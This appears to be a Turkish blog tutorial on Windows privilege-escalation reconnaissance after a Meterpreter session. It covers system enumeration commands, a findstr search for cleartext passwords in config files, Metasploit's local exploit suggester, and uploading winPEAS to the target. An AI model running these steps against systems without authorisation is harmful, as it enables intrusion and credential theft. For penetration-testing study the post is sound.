Lokal Zafiyet Araştırması için Kullanabilir Yaygın Araç ve Komutlar

Windows Yetki yükseltmesi için lokal zafiyet araştırmasının yapılması

    Exploit işlemi sonucunda elde ettiğimiz her oturum yüksek yetkili olması beklenmeyen durumdur. Bu durumlarda kullanabileceğimiz , daha doğrusu erişilen sistemin içeresinden aktif bilgi toplayabileceğimiz komut satırları ve otomatize araçlar bulunmaktadır. Bu araçların ve komutların ilgili sürüm ya da servisler ile bağımlıkları olduğundan dolayı her zaman çalışmayabilir. Windows komut satırı, Metasploit Exploit Suggester ve winPeas araçların kullanımını adım adım göstereceğim.

 

Windows Komut Satırları İle Bilgi Toplamak

   Meterpreter oturumundan shell kabuğuna geçilir. Bu işlem ile cmd komut satırlarını kullanarak oturum elde ettiğimiz bilgisayar üzerinden bilgiler toplanır.

meterpreter shell

İşletim sistemi hakkında bilgi Edinmek

systeminfo

komutu ile OS version tespiti yapılabilir ve bununla ilgili kernel zafiyetlerini google üzerinden gerekli kernel zafiyetlerin araştırması yapılabilir.

 

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Yada bu komut satırı ile daha kısa bir bilgi edinebiliriz.

 

wmic qfe

Komutu ile yüklü olan güncelleme paketlerini görebiliriz.

windows command update list

 

echo %USERNAME%

whoami

komutu ile kullanıcı adını öğrenebiliriz.

 

net users

Bilgisayar üzerinde olan diğer kullanıcıları göstericektir.

 

net user asim

İstenilen kullanıcı ile ilgili bilgi almak için komut kullanılır.

 

netstat -ano

Hedef sistemin şuanki bağlantılarını, açık portlarını görebiliriz. Dışarıdan tarama sonucunda göremediğimiz portları yakalayabiliriz.

net share

Ağ üzerinde paylaşılan dosyaları görüntüler

netsh firewall show state

Firewall durumunu görüntülemeye yarar.

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt

xml,ini ve txt dosyaları içeresinde password kelimesini aranmasını sağlar. Bu sayede kayıtlı bir şifre cleartext tutuluyorsa elde edebiliriz.

Wİndows find passwords words

 

Otomatize Araçlar ile Windows Lokal zafiyetlerin Tespit Edilmesi

Metasploit LocalExploit Suggester ile taramayı gerçekleştirelim.

run post/multi/recon/local_exploit_suggester

metasploit local suggester kullanımı

run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true

Eğer bu şekilde komut verirsek detaylarıda görebilir duruma geliriz.

metasploit suggester detail

 

WinPEAS Aracının Kullanılması

WinPEAS .exe and .bat aracını kullanılım. İlgili exe dosyasını indirmek için aşağıdaki github adresinden, https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/ dizini içeresinden exe  dosyasını indirmeniz gerekmektedir. İndirdiğimi exe dosyasını hedef sisteme upload etmemiz gerekiyor. Bunun için aşağıdaki meterpreter komutu kullanılır.
ilk olarak winPeas.exe dosyasının yolunu ve ismini yazılır ve diğer kısmada hedef yol yazılarak karşı tarafa yükleme gerçekleştirilir.

upload /home/asim/Downloads/winPEAS.exe C:\\Users\\asim\\Desktop\\

meterpreter upload kullanımı

Hedef sisteme attığımız lokal zafiyet bulma uygulamasını çalıştıralım. Uygulamayı çalıştırmak için shell kabuğuna geçmeli ve ilgili dizine gitmeliyiz.

winPEAS kullanımı
winPeas kullanımı

Aşağıdaki zafiyetlerin olduğunu bize gösteriyor. Bununla beraber hatalı yapalandırma, password kelimesi ve sistem bilgilerini okunabilir şekilde ekrana getiriyor.

yetki yükseltme araçları

 

winPeas Kullanımı

Bir sonraki yazımda Watson derlenmesi/kullanılmasını ve diğer otomatize araçları da anlatacağım.

 

Kaynaklar:

https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

Leave a Reply

Your email address will not be published. Required fields are marked *